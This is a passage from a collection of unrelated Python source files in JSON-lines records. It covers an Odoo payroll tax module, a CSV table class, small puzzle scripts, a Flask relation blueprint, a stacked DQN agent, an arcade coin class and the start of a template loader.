line.rule.tax_class_id == tax_class_id) and\n (not type_id or line.rule.type_id == type_id) and\n (not category_code or line.rule.category_id.code == category_code)):\n total += line.total_per_line\n return total\n\n @api.multi\n def get_ptkp(self, tax_status_id):\n # payslip.env['hr.payslip'].get_ptkp(employee.tax_status_id)\n ptkp = self.env['hr.kg.payroll.tax.ptkp'].search([\n ('id', '=', tax_status_id.id)\n ])\n return ptkp.value\n\n @api.multi\n def get_pkp(self, tax_config_id, pkp_value):\n # payslip.env['hr.payslip'].get_pkp(employee.company_id.tax_config_id, pkp1)\n lst = []\n tax_config = self.env['hr.kg.payroll.tax.pkp'].search([\n ('tax_config_id', '=', tax_config_id.id),\n ], order=\"max_value asc\")\n min = 0\n for rec in tax_config:\n max = rec.max_value\n if (pkp_value > min and pkp_value < max) or rec.is_unlimited is True:\n result = (pkp_value - min) * (rec.percentage / 100)\n lst.append(result)\n break\n else:\n result = (max - min) * (rec.percentage / 100)\n lst.append(result)\n min = rec.max_value\n return sum(lst)\n\n @api.multi\n def get_family(self, fam_status_id):\n # payslip.env['hr.payslip'].get_family(employee.fam_status_id)\n family = self.env['hr.kg.payroll.configuration.family'].search([\n ('id', '=', fam_status_id.id)\n ])\n return family.percentage\n\n @api.multi\n def get_service_charge(self, payroll_config_id, date):\n # payslip.env['hr.payslip'].get_service_charge(employee.company_id.payroll_config_id, payslip.date_to)\n\n years = Datetime.from_string(date)\n service_charge = self.env['hr.kg.payroll.configuration.service.charge'].search([\n '&', ('payroll_config_id', '=', payroll_config_id.id),\n ('year', '=', years.year)\n\n ])\n return service_charge.max_value\n\n\nclass BrowsableObject(object):\n def __init__(self, employee_id, dict_object, env):\n self.employee_id = employee_id\n self.dict = dict_object\n self.env = env\n\n def __getattr__(self, attr):\n return attr in self.dict and self.dict.__getitem__(attr) or 0.0\n\n\nclass InputLine(BrowsableObject):\n \"\"\"a class that will be used into the python code, mainly for usability purposes\"\"\"\n\n def sum(self, code, from_date, to_date=None):\n if to_date is None:\n to_date = fields.Date.today()\n self.env.cr.execute(\"\"\"\n SELECT sum(amount) as sum\n FROM hr_payslip as hp, hr_payslip_input as pi\n WHERE hp.employee_id = %s AND hp.state = 'done'\n AND hp.date_from >= %s AND hp.date_to <= %s AND hp.id = pi.payslip_id AND pi.code = %s\"\"\",\n (self.employee_id, from_date, to_date, code))\n return self.env.cr.fetchone()[0] or 0.0\n\n\nclass WorkedDays(BrowsableObject):\n \"\"\"a class that will be used into the python code, mainly for usability purposes\"\"\"\n\n def _sum(self, code, from_date, to_date=None):\n if to_date is None:\n to_date = fields.Date.today()\n self.env.cr.execute(\"\"\"\n SELECT sum(number_of_days) as number_of_days, sum(number_of_hours) as number_of_hours\n FROM hr_payslip as hp, hr_payslip_worked_days as pi\n WHERE hp.employee_id = %s AND hp.state = 'done'\n AND hp.date_from >= %s AND hp.date_to <= %s AND hp.id = pi.payslip_id AND pi.code = %s\"\"\",\n (self.employee_id, from_date, to_date, code))\n return self.env.cr.fetchone()\n\n def sum(self, code, from_date, to_date=None):\n res = self._sum(code, from_date, to_date)\n return res and res[0] or 0.0\n\n def sum_hours(self, code, from_date, to_date=None):\n res = self._sum(code, from_date, to_date)\n return res and res[1] or 0.0\n\n\nclass Payslips(BrowsableObject):\n \"\"\"a class that will be used into the python code, mainly for usability purposes\"\"\"\n\n def sum(self, code, from_date, to_date=None):\n if to_date is None:\n to_date = fields.Date.today()\n self.env.cr.execute(\"\"\"SELECT sum(case when hp.credit_note = False then (pl.total) else (-pl.total) end)\n FROM hr_payslip as hp, hr_payslip_line as pl\n WHERE hp.employee_id = %s AND hp.state = 'done'\n AND hp.date_from >= %s AND hp.date_to <= %s AND hp.id = pl.slip_id AND pl.code = %s\"\"\",\n (self.employee_id, from_date, to_date, code))\n res = self.env.cr.fetchone()\n return res and res[0] or 0.0\n\n\nclass HrPayslipLine(models.Model):\n _inherit = 'hr.payslip.line'\n\n is_taxed = fields.Boolean(string='Taxed')\n tax_class_id = fields.Selection(selection=[('R', 'Regular Income'), ('I', 'Irregular Income')])\n type_id = fields.Selection(selection=[('FIXED', 'Fixed'), ('VAR', 'Var'), ('BPJS', 'BPJS')])\n nik_name = fields.Char(compute='get_nik_name', store=True)\n date_to = fields.Date(related='slip_id.date_to', store=True, string='Periode')\n nik = fields.Char(related='employee_id.employee_id', store=True)\n department = fields.Char(related='employee_id.department_id.name', store=True)\n\n @api.multi\n def get_nik_name(self):\n for line in self:\n if line.slip_id.employee_id.employee_id:\n line.nik_name = \"{nik}{strip}{name}\".format(nik=line.slip_id.employee_id.employee_id, strip=' - ',\n name=line.slip_id.employee_id.name)\n else:\n line.nik_name = \"\"\n\nclass HrPayslipInput(models.Model):\n _inherit = 'hr.payslip.input'\n\n transfer_type = fields.Selection([(\"combine\", \"Combine\"), (\"separate\", \"Separate\")], string='Transfer Type')\n transfer_request_id = fields.Many2one('bank.transfer.request.payroll', string='Transfer Request ID')\n","sub_path":"local/kg_payroll/models/hr_payslip.py","file_name":"hr_payslip.py","file_ext":"py","file_size_in_byte":15125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"418767029","text":"import csv # Python package for reading and writing CSV files.\nimport pandas as pd\nimport os\n\n# You can change to wherever you want to place your CSV files.\nrel_path = os.path.realpath('../Data')\n\n\nclass CSVDataTable:\n # Change to wherever you want to save the CSV files.\n data_dir = rel_path + \"/\"\n\n def __init__(self, table_name, table_file, key_columns):\n \"\"\"\n Constructor\n :param table_name: Logical names for the data table.\n :param table_file: Name of CSV file to read/write(Location).\n :param key_columns: List of column names the form the primary key.\n \"\"\"\n self.table_name = table_name;\n self.table_file = table_file;\n self.key_columns = key_columns;\n self.fieldnames = list();\n self.table_data = list();\n pass\n\n def __str__(self):\n \"\"\"\n Pretty print the table and state.\n :return: String\n If we can use panda do as follows\n \"\"\";\n table_data = self.table_data;\n pd.set_option('display.max_columns', 500);\n pd.set_option('display.width', 1000);\n print(pd.DataFrame(table_data, columns=self.fieldnames));\n\n pass\n\n def load(self):\n \"\"\"\n Load information from CSV file.\n :return: rows\n \"\"\"\n self.table_data = [];\n with open(self.data_dir + self.table_file) as csvfile:\n rows = csv.DictReader(csvfile);\n self.fieldnames = rows.fieldnames;\n for row in rows:\n self.table_data.append(dict(row));\n return self.table_data;\n\n def find_by_primary_key(self, values, fields=None):\n \"\"\"\n Input value is a list of string. The order of values should correspond to key_columns.\n Fields is a list defining which of the fields from the row/tuple you want.\n Output is the single dictionary in the table that is the matching result, or null/None.\n \"\"\"\n result = list();\n if len(values) != len(self.key_columns):\n raise ValueError(str(self.key_columns), \"Invalid values for primary keys\");\n else:\n for row in self.table_data:\n flag = True;\n i = 0;\n for key in self.key_columns:\n if row[key] != values[i]:\n flag = False;\n i = i + 1;\n if flag:\n if fields is None:\n result.append(row);\n else:\n new_row = dict();\n for f in fields:\n new_row[f] = row[f];\n result.append(new_row);\n\n if len(result) > 1:\n raise ValueError(str(self.key_columns), \"Invalid primary keys with multiple matching result\")\n if len(result) < 1:\n print(\"There is no matching result for values: \" + str(values));\n\n return result;\n\n def find_by_template(self, t, fields=None):\n \"\"\"\n Return a table containing the rows matching the template and field selector.\n :param t: Template that the rows much match.\n :param fields: A list of columns to include in responses.\n :return: CSVTable containing the answer.\n \"\"\"\n rows = self.table_data;\n result = list();\n for row in rows:\n flag = True;\n for k in t.keys():\n if k in self.fieldnames:\n if row[k] != t.get(k):\n flag = False;\n else:\n return KeyError(k, \"Invalid key\");\n if flag:\n if fields is None:\n result.append(row);\n else:\n new_row = dict();\n for f in fields:\n new_row[f] = row[f];\n result.append(new_row);\n return result;\n\n def save(self):\n \"\"\"\n Write updated CSV back to the original file location.\n :return: None\n \"\"\"\n with open(self.data_dir + self.table_file, 'w') as csvTable:\n rows = self.table_data;\n writer = csv.DictWriter(csvTable, self.fieldnames);\n writer.writeheader();\n writer.writerows(rows);\n pass\n\n def insert(self, r):\n \"\"\"\n Insert a new row into the table.\n :param r: New row. r is a dict of \n :return: None. Table state is updated.\n \"\"\"\n row = dict();\n # check key validity\n for k in r.keys():\n if k not in self.fieldnames:\n raise KeyError(k, \"Invalid key\");\n # check primary key completeness\n pk_value = list();\n for pk in self.key_columns:\n if pk not in r.keys():\n raise KeyError(k, \"Lack of primary key\");\n else:\n pk_value.append(r.get(pk));\n # check duplicate primary key\n try:\n result = self.find_by_primary_key(pk_value, self.key_columns);\n except (ValueError, KeyError):\n pass\n\n if len(result) > 0:\n raise KeyError(k, \"Duplicate primary key\");\n\n for f in self.fieldnames:\n if f in r.keys():\n row[f] = r[f];\n else:\n row[f] = None;\n self.table_data.append(row);\n return self.table_data;\n\n def delete(self, t):\n \"\"\"\n Delete all tuples matching the template.\n :param t: Template\n :return: None. Table is updated.\n \"\"\"\n try:\n result = self.find_by_template(t);\n except (ValueError, KeyError) as e:\n print(e);\n if len(result) <= 0:\n print(\"Nothing to delete\");\n pass\n\n for row in result:\n if row in self.table_data:\n self.table_data.remove(row);\n return self;\n","sub_path":"hw1/CSVDataTable/CSVDataTable.py","file_name":"CSVDataTable.py","file_ext":"py","file_size_in_byte":5935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"580014003","text":"#!/usr/bin/python3\n\n\ndef spoil(rows,cols,field,row1,col1,row2,col2):\n\tnewfield = []\n\tfor i in range(rows):\n\t\trow = []\n\t\tfor j in range(cols):\n\t\t\trow.append(field[i][j])\n\t\tnewfield.append(row)\n\n\tnewfield[row1][col1] = \"X\"\n\tnewfield[row2][col2] = \"X\"\n\n\tfor i in range(rows):\n\t\tfor j in range(cols):\n\t\t\tif field[i][j] != \"O\":\n\n\t\t\t\ti_copy = i + 1\n\t\t\t\tif i_copy >= 0 and i_copy < rows:\n\t\t\t\t\tnewfield[i_copy][j] = \"X\"\n\t\t\t\t\n\t\t\t\ti_copy = i - 1\n\t\t\t\tif i_copy >= 0 and i_copy < rows :\n\t\t\t\t\tnewfield[i_copy][j] = \"X\"\n\n\t\t\t\tj_copy = j + 1\n\t\t\t\tif j_copy >= 0 and j_copy < cols:\n\t\t\t\t\tnewfield[i][j_copy] = \"X\"\n\n\t\t\t\tj_copy = j - 1\n\t\t\t\tif j_copy >= 0 and j_copy < cols:\n\t\t\t\t\tnewfield[i][j_copy] = \"X\"\t\t\t\t\t\n\n\n\n\treturn newfield\n\ndef PrintField(matrix,rows,cols):\n\tfor i in range(rows):\n\t\t\tfor j in range(cols):\n\t\t\t\tprint(field[i][j],end=\" \")\n\t\t\tprint(\"\")\n\treturn\n\n\n\n\n\nrows,cols,R = input().split()\nrows = int(rows) # rows\ncols = int(cols) # cols\nR = int(R)\nfield = []\nfor i in range(rows):\n\trow = []\n\tfor j in range(cols):\n\t\trow.append(\"O\")\n\tfield.append(row)\n\n\t\t\t \t\n\nrow1,col1 = input().split()\nrow2,col2 = input().split()\n\nrow1 = int(row1)\nrow2 = int(row2)\ncol1 = int(col1)\ncol2 = int(col2)\n\nfield[row1][col1] = \"X\"\nfield[row2][col2] = \"X\"\n\n\n\nfor i in range(R):\n\tfield = spoil(rows,cols,field,row1,col1,row2,col2)\ncount = 0\nfor i in range(rows):\n\tfor j in range(cols):\n\t\tif field[i][j] == \"O\":\n\t\t\tcount+=1\nPrintField(field,rows,cols)\t\nprint(count)\n","sub_path":"boyanM-Strawberry/strawberry.py","file_name":"strawberry.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"436458737","text":"import os\nx = 0\n\nprint (\"Please enter a directory.\")\nfile_path = str(input(\"> \"))\ndef file_size(file):\n size = os.path.getsize(file)\n print(size)\n\nfile_size(file_path)\n\nprint (\"See more stats?\")\nwhile x < 1000:\n decision = str(input(\"y/n > \"))\n if decision == \"y\":\n print (\"This feature has not been added yet. Sorry!\")\n break\n elif decision == \"n\":\n print (\"Good. We can't tell you anything anyway.\")\n break\n else:\n print(\"I'm sorry. I didn't understand that\")\n","sub_path":"file_reader.py","file_name":"file_reader.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"107701293","text":"from anagram_sets import find_all_anagrams\n\ndef word_distance(word1, word2):\n \"\"\"returns the number of differences between two words\n\n word1, word2: string\n return: int\n \"\"\"\n assert(len(word1) == len(word2))\n count = 0\n for l1, l2 in zip(word1, word2):\n if l1 != l2:\n count += 1\n return count\n\n\ndef print_all_methathesis_pairs(d):\n '''prints all pairs of words that can be generated by swapping two letters\n\n d: map from word to all its anagrams\n '''\n for anagrams in d.values():\n for word1 in anagrams:\n for word2 in anagrams:\n if word1 < word2 and word_distance(word1, word2) == 2:\n print(word1, word2)\n\n\nif __name__ == '__main__':\n all_anagrams = find_all_anagrams('words.txt')\n\n print_all_methathesis_pairs(all_anagrams)\n\n\n","sub_path":"metathesis.py","file_name":"metathesis.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"126765516","text":"import logging\n\nfrom collections import namedtuple\n\nfrom flask import Blueprint, render_template, request, abort, redirect, url_for\n\nfrom . import db\nfrom .db import session_scope\n\nlogger = logging.getLogger(\"quoted-forsooth.relation\")\n\nrelation = Blueprint('relation', __name__)\n\n@relation.route('/relation_type/add/')\n@relation.route('/relation_type//edit/')\ndef add_type_index(db_id=None):\n with session_scope() as session:\n if db_id:\n relation_type = session.query(db.SourceRelationType).get(db_id)\n else:\n relation_type = None\n return render_template('relation/relation_type_edit.html', relation_type=relation_type)\n\ndef extract_relations(source, nodes=None, edges=None, depth=0, maxdepth=None, characters=False, characters_only=False, character_level='all', own_characters_only=False):\n if not nodes:\n nodes = set()\n if not edges:\n edges = set()\n if source in nodes:\n return nodes, edges\n else:\n nodes.add(source)\n if not characters_only:\n edges |= source.relations\n if characters or characters_only:\n if character_level == 'main':\n edges |= set(a for a in source.appearances if not a.type or a.type.name == 'Main')\n nodes |= set(a.character for a in source.appearances if not a.type or a.type.name == 'Main')\n elif character_level == 'sub':\n edges |= set(a for a in source.appearances if not a.type or a.type.name in ('Main', 'Sub'))\n nodes |= set(a.character for a in source.appearances if not a.type or a.type.name in ('Main', 'Sub'))\n else:\n edges |= set(source.appearances)\n nodes |= set(source.characters)\n\n if own_characters_only:\n if character_level == 'main':\n edges |= set(a for c in source.characters for a in c.appearances if not a.type or a.type.name == 'Main')\n nodes |= set(a.source for c in source.characters for a in c.appearances if not a.type or a.type.name == 'Main')\n elif character_level == 'sub':\n edges |= set(a for c in source.characters for a in c.appearances if not a.type or a.type.name in ('Main', 'Sub'))\n nodes |= set(a.source for c in source.characters for a in c.appearances if not a.type or a.type.name in ('Main', 'Sub'))\n else:\n edges |= set(a for c in source.characters for a in c.appearances)\n nodes |= set(a.source for c in source.characters for a in c.appearances)\n else:\n if not (maxdepth and depth >= maxdepth):\n if character_level == 'main':\n for s in set(s for a in source.appearances if not a.type or a.type.name == 'Main' for s in a.character.sources):\n extract_relations(s, nodes, edges, depth + 1, maxdepth, characters, characters_only, character_level)\n elif character_level == 'sub':\n for s in set(s for a in source.appearances if not a.type or a.type.name in ('Main', 'Sub') for s in a.character.sources):\n extract_relations(s, nodes, edges, depth + 1, maxdepth, characters, characters_only, character_level)\n else:\n for s in set(s for c in source.characters for s in c.sources):\n extract_relations(s, nodes, edges, depth + 1, maxdepth, characters, characters_only, character_level)\n if not (characters_only or (maxdepth and depth >= maxdepth)):\n for s in set([s['source'] for sub in source.relations_dict.values() for s in sub]):\n if own_characters_only:\n extract_relations(s, nodes, edges, depth + 1, maxdepth, characters=False, characters_only=characters_only, character_level=character_level)\n else:\n extract_relations(s, nodes, edges, depth + 1, maxdepth, characters, characters_only, character_level)\n return nodes, edges\n\n@relation.route('/source//visualize_relations/')\ndef visualize(db_id):\n with session_scope() as session:\n source = session.query(db.Source).get(db_id)\n if not source:\n abort(404)\n characters = 'false' not in request.args.getlist('characters')\n characters_only = 'only' in request.args.getlist('characters')\n own_characters_only = 'own' in request.args.getlist('characters')\n character_level = (\n 'all' if 'all' in request.args.getlist('characters') else\n 'sub' if 'sub' in request.args.getlist('characters') else\n 'main')\n depth = request.args.get('depth', type=int, default=0)\n nodes, edges = extract_relations(\n source,\n characters=characters,\n characters_only=characters_only,\n own_characters_only=own_characters_only,\n character_level=character_level,\n maxdepth=depth)\n if 'series' in request.args:\n if source.series:\n nodes |= set(source.series.sources)\n RelType = namedtuple('RelType', ['name'])\n Rel = namedtuple('Rel', ['left_source_id', 'right_source_id', 'relation_type'])\n s = sorted(source.series.sources, key=lambda s: s.date)\n edges |= set([Rel(s[i].id, s[i+1].id, RelType('series')) for i in range(len(s) - 1)])\n return render_template('relation/relation_visualize.html', source=source, nodes=nodes, edges=edges)\n\n@relation.route('/relation_type/add/', methods=['POST'])\n@relation.route('/relation_type//edit/', methods=['POST'])\ndef add_type(db_id=None):\n with session_scope() as session:\n if 'db_id' in request.form:\n if db_id and db_id != request.form.get('db_id', type=int):\n raise ValueError(\"POSTed relation type ID does not match URL.\")\n relation_type = session.query(db.SourceRelationType).get(int(request.form['db_id']))\n else:\n relation_type = db.SourceRelationType()\n\n relation_type.name = request.form['name']\n relation_type.left_list_name = request.form['left_list_name']\n relation_type.right_list_name = request.form['right_list_name']\n relation_type.ltr_format = request.form['ltr_format']\n relation_type.rtl_format = request.form['rtl_format']\n\n session.add(relation_type)\n\n return redirect(url_for('index'))\n\n@relation.route('/relation/add/')\n@relation.route('/relation//edit/')\ndef add_index(db_id=None):\n with session_scope() as session:\n relation_types = session.query(db.SourceRelationType).order_by(db.SourceRelationType.name).all()\n if db_id:\n relation = session.query(db.SourceRelation).get(db_id)\n else:\n relation = None\n return render_template('relation/relation_edit.html', relation_types=relation_types, relation=relation)\n\n@relation.route('/series_relation/add/')\n@relation.route('/series_relation//edit/')\ndef add_series_index(db_id=None):\n with session_scope() as session:\n relation_types = session.query(db.SourceRelationType).order_by(db.SourceRelationType.name).all()\n series = session.query(db.Series).order_by(db.Series.name).all()\n if db_id:\n relation = session.query(db.SeriesRelation).get(db_id)\n else:\n relation = None\n return render_template('relation/series_relation_edit.html', relation_types=relation_types, relation=relation, series=series)\n\n@relation.route('/relation/add/', methods=['POST'])\n@relation.route('/relation//edit/', methods=['POST'])\ndef add(db_id=None):\n with session_scope() as session:\n left = session.query(db.Source).get(int(request.form['left']))\n right = session.query(db.Source).get(int(request.form['right']))\n relation_type = session.query(db.SourceRelationType).get(int(request.form['relation_type']))\n if 'db_id' in request.form:\n if db_id and db_id != request.form.get('db_id', type=int):\n raise ValueError(\"POSTed relation ID does not match URL.\")\n relation = session.query(db.SourceRelation).get(int(request.form['db_id']))\n else:\n relation = db.SourceRelation()\n relation.left_source = left\n relation.right_source = right\n relation.relation_type = relation_type\n session.add(relation)\n session.flush()\n\n return redirect(url_for('.view', db_id=relation.id))\n\n@relation.route('/series_relation/add/', methods=['POST'])\n@relation.route('/series_relation//edit/', methods=['POST'])\ndef series_add(db_id=None):\n with session_scope() as session:\n left = session.query(db.Series).get(int(request.form['left']))\n right = session.query(db.Series).get(int(request.form['right']))\n relation_type = session.query(db.SourceRelationType).get(int(request.form['relation_type']))\n if 'db_id' in request.form:\n if db_id and db_id != request.form.get('db_id', type=int):\n raise ValueError(\"POSTed series relation ID does not match URL.\")\n relation = session.query(db.SeriesRelation).get(int(request.form['db_id']))\n else:\n relation = db.SeriesRelation()\n relation.left_series = left\n relation.right_series = right\n relation.relation_type = relation_type\n session.add(relation)\n session.flush()\n\n return redirect(url_for('.series_view', db_id=relation.id))\n\n@relation.route('/relation//')\ndef view(db_id):\n with session_scope() as session:\n rel = session.query(db.SourceRelation).get(db_id)\n if not rel:\n abort(404)\n return render_template('relation/relation_view.html', relation=rel)\n\n@relation.route('/series_relation//')\ndef series_view(db_id):\n with session_scope() as session:\n rel = session.query(db.SeriesRelation).get(db_id)\n if not rel:\n abort(404)\n return render_template('relation/series_relation_view.html', relation=rel)\n","sub_path":"relation.py","file_name":"relation.py","file_ext":"py","file_size_in_byte":10244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"36585316","text":"from Agents.DQN.BaseDQN import BaseDQNAgent\nfrom Agents.DQN.DQN import DQNAgent\n\nfrom Agents.Core.ReplayMemory import ReplayMemory, Transition\n\nfrom Agents.Core.ReplayMemoryReward import ReplayMemoryReward\nfrom Agents.Core.PrioritizedReplayMemory import PrioritizedReplayMemory\n\nimport random\nimport torch\nimport torch.optim\nimport numpy as np\nfrom enum import Enum\nimport simplejson as json\nimport os\nimport math\nimport pickle\n\n\nclass StackedDQNAgent(DQNAgent):\n\n def __init__(self, config, policyNet, targetNet, env, optimizer, netLossFunc, nbAction, stateProcessor=None,\n experienceProcessor=None, timeIndexMap=None):\n\n self.policyNets = policyNet\n self.targetNets = targetNet\n self.optimizers = optimizer\n\n super(StackedDQNAgent, self).__init__(config, policyNet, targetNet, env, optimizer, netLossFunc, nbAction,\n stateProcessor, experienceProcessor)\n self.policyNet = None\n self.targetNet = None\n self.optimizer = None\n self.timeIndexMap = timeIndexMap\n self.init_memory()\n\n def initialization(self):\n # move model to correct device\n for i in range(len(self.policyNets)):\n self.policyNets[i] = self.policyNets[i].to(self.device)\n\n # in case targetNet is None\n for i in range(len(self.targetNets)):\n if self.targetNets[i] is not None:\n self.targetNets[i] = self.targetNets[i].to(self.device)\n\n self.dirName = 'Log/'\n if 'dataLogFolder' in self.config:\n self.dirName = self.config['dataLogFolder']\n if not os.path.exists(self.dirName):\n os.makedirs(self.dirName)\n\n self.identifier = ''\n self.epIdx = 0\n self.learnStepCounter = 0 # for target net update\n self.globalStepCount = 0\n self.losses = []\n self.rewards = []\n self.nStepBuffer = []\n\n self.individualStepCounts = [0 for _ in range(len(self.policyNets))]\n\n def init_memory(self):\n\n self.memories = [ReplayMemory(self.memoryCapacity) for _ in range(len(self.policyNets))]\n\n def store_experience(self, state, action, nextState, reward, info):\n\n if self.experienceProcessor is not None:\n state, action, nextState, reward = self.experienceProcessor(state, action, nextState, reward, info)\n # caution: using multiple step forward return can increase variance\n # if it is one step\n\n timeStep = self.timeIndexMap[state['timeStep']]\n transition = Transition(state, action, nextState, reward)\n self.memories[timeStep].push(transition)\n\n def work_before_step(self, state):\n timeStep = self.timeIndexMap[state['timeStep']]\n\n self.epsThreshold = self.epsilon_by_step(self.individualStepCounts[timeStep])\n\n\n\n def update_net(self, state, action, nextState, reward, info):\n\n # first store memory\n\n self.store_experience(state, action, nextState, reward, info)\n\n\n if self.hindSightER and nextState is not None and self.globalStepCount % self.hindSightERFreq == 0:\n stateNew, actionNew, nextStateNew, rewardNew = self.env.getHindSightExperience(state, action, nextState, info)\n if stateNew is not None:\n self.store_experience(stateNew, actionNew, nextStateNew, rewardNew, info)\n\n\n # update net with specified frequency\n if self.globalStepCount % self.netUpdateFrequency == 0:\n # sample experience\n\n for i in range(len(self.memories) - 1, -1, -1):\n if len(self.memories[i]) < self.trainBatchSize:\n continue\n\n transitions_raw = self.memories[i].sample(self.trainBatchSize)\n self.policyNet = self.policyNets[i]\n self.optimizer = self.optimizers[i]\n\n if self.netUpdateOption == 'targetNet' or self.netUpdateOption == 'doubleQ':\n if i < (len(self.memories) - 1):\n self.targetNet = self.targetNets[i + 1]\n else:\n self.targetNet = self.targetNets[i]\n if self.netUpdateOption == 'policyNet':\n raise NotImplementedError\n\n loss = self.update_net_on_transitions(transitions_raw, self.netLossFunc, 1,\n updateOption=self.netUpdateOption, netGradClip=self.netGradClip,\n info=info)\n\n if self.globalStepCount % self.lossRecordStep == 0:\n self.losses.append([self.globalStepCount, self.epIdx, loss])\n\n # caution! it is targetNets[i] not targetNets[i + 1]\n if self.learnStepCounter % self.targetNetUpdateStep == 0:\n self.targetNets[i].load_state_dict(self.policyNet.state_dict())\n\n self.learnStepCounter += 1\n\n def save_all(self):\n prefix = self.dirName + self.identifier + 'Finalepoch' + str(self.epIdx)\n torch.save({\n 'epoch': self.epIdx,\n 'globalStep': self.globalStepCount,\n 'model_state_dict': [net.state_dict() for net in self.policyNets],\n 'optimizer_state_dict': [opt.state_dict() for opt in self.optimizers]\n }, prefix + '_checkpoint.pt')\n with open(prefix + '_memory.pickle', 'wb') as file:\n pickle.dump(self.memories, file)\n self.saveLosses(prefix + '_loss.txt')\n self.saveRewards(prefix + '_reward.txt')\n\n def save_checkpoint(self):\n prefix = self.dirName + self.identifier + 'Epoch' + str(self.epIdx)\n self.saveLosses(prefix + '_loss.txt')\n self.saveRewards(prefix + '_reward.txt')\n with open(prefix + '_memory.pickle', 'wb') as file:\n pickle.dump(self.memories, file)\n\n torch.save({\n 'epoch': self.epIdx,\n 'globalStep': self.globalStepCount,\n 'model_state_dict': [net.state_dict() for net in self.policyNets],\n 'optimizer_state_dict': [opt.state_dict() for opt in self.optimizers]\n }, prefix + '_checkpoint.pt')\n\n def load_checkpoint(self, prefix):\n # self.loadLosses(prefix + '_loss.txt')\n # self.loadRewards(prefix + '_reward.txt')\n with open(prefix + '_memory.pickle', 'rb') as file:\n self.memories = pickle.load(file)\n\n checkpoint = torch.load(prefix + '_checkpoint.pt')\n self.epIdx = checkpoint['epoch']\n self.globalStepCount = checkpoint['globalStep']\n for i in range(len(self.policyNets)):\n self.policyNets[i].load_state_dict(checkpoint['model_state_dict'][i])\n self.targetNets[i].load_state_dict(checkpoint['model_state_dict'][i])\n self.optimizers[i].load_state_dict(checkpoint['optimizer_state_dict'][i])","sub_path":"Agents/StackedDQN/StackedDQN.py","file_name":"StackedDQN.py","file_ext":"py","file_size_in_byte":6857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"241635434","text":"import arcade\r\nimport random\r\nfrom wall import Wall\r\n\r\nclass Coin:\r\n\r\n coin_list = arcade.SpriteList()\r\n\r\n def __init__(self, x, y, image_path, SPRITE_SCALING):\r\n self.x = x\r\n self.y = y\r\n self.coin_sprite = arcade.Sprite(image_path, SPRITE_SCALING)\r\n self.coin_sprite.center_x = self.x\r\n self.coin_sprite.center_y = self.y\r\n\r\n def getSprite(self):\r\n return self.coin_sprite\r\n\r\n\r\n def placeCoins(NUMBER_OF_COINS):\r\n for i in range(NUMBER_OF_COINS):\r\n\r\n coin = Coin(0, 0, \"images\\\\coin.png\", 1)\r\n\r\n # Boolean variable if we successfully placed the coin\r\n coin_placed_successfully = False\r\n\r\n # Keep trying until success\r\n while not coin_placed_successfully:\r\n # Position the coin\r\n coin.getSprite().center_x = random.randrange(800)\r\n coin.getSprite().center_y = random.randrange(600)\r\n\r\n # See if the coin is hitting a wall\r\n wall_hit_list = arcade.check_for_collision_with_list(coin.getSprite(), Wall.wall_list)\r\n\r\n # See if the coin is hitting another coin\r\n coin_hit_list = arcade.check_for_collision_with_list(coin.getSprite(), Coin.coin_list)\r\n\r\n if len(wall_hit_list) == 0 and len(coin_hit_list) == 0:\r\n # It is!\r\n coin_placed_successfully = True\r\n\r\n # Add the coin to the lists\r\n Coin.coin_list.append(coin.getSprite())\r\n","sub_path":"coin.py","file_name":"coin.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"544918008","text":"import base64\nimport gridfs\nimport logging\nimport os\nimport pymongo\nimport shutil\nimport typing\nimport uuid\n\nfrom document_worker.consts import TemplateField, FormatField, TemplateAssetField, TemplateFileField\nfrom document_worker.documents import DocumentFile\nfrom document_worker.templates.formats import Format\n\n\nclass TemplateException(Exception):\n\n def __init__(self, template_id: str, message: str):\n self.template_id = template_id\n self.message = message\n\n\nclass Asset:\n\n def __init__(self, asset_uuid: str, filename: str, content_type: str,\n data: bytearray):\n self.asset_uuid = asset_uuid\n self.filename = filename\n self.content_type = content_type\n self.data = data\n\n @property\n def data_base64(self) -> str:\n return base64.b64encode(self.data).decode('ascii')\n\n @property\n def src_value(self):\n return f'data:{self.content_type};base64,{self.data_base64}'\n\n\nclass Template:\n\n META_REQUIRED = [TemplateField.ID,\n TemplateField.NAME,\n TemplateField.METAMODEL_VERSION,\n TemplateField.FORMATS,\n TemplateField.FILES]\n\n def __init__(self, config, template_dir: str, template_id: str, template_data: dict, mongo_db):\n self.config = config\n self.template_dir = template_dir\n self.mongo_db = mongo_db\n self.template_id = template_id\n logging.info(f'Loading {template_id}')\n self.metadata = template_data\n logging.info(f'Verifying {template_id}')\n self._verify_metadata()\n self.name = self.metadata[TemplateField.NAME]\n logging.info(f'Setting up formats for template {self.template_id}')\n self.formats = dict()\n self.assets = dict()\n self.download_template_files()\n self.download_template_assets()\n\n @property\n def files(self):\n return self.metadata[TemplateField.FILES]\n\n def raise_exc(self, message: str):\n raise TemplateException(self.template_id, message)\n\n def _verify_metadata(self):\n for required_field in self.META_REQUIRED:\n if required_field not in self.metadata:\n self.raise_exc(f'Missing required field {required_field}')\n\n def fetch_asset(self, filename: str) -> typing.Optional[Asset]:\n logging.info(f'Fetching asset \"{filename}\"')\n if filename in self.assets.keys():\n return self.assets[filename]\n found_asset = None\n for asset in self.metadata.get(TemplateField.ASSETS, []):\n if asset.get(TemplateAssetField.FILENAME, '') == filename:\n found_asset = asset\n if found_asset is None:\n logging.warning(f'Asset \"{filename}\" not found in template')\n return None\n assets_fs = gridfs.GridFS(self.mongo_db, self.config.mongo.assets_fs_collection)\n file = assets_fs.find_one({'filename': found_asset[TemplateAssetField.UUID]})\n if file is None:\n logging.error(f'Asset \"{filename}\" not found in GridFS')\n return None\n return Asset(\n 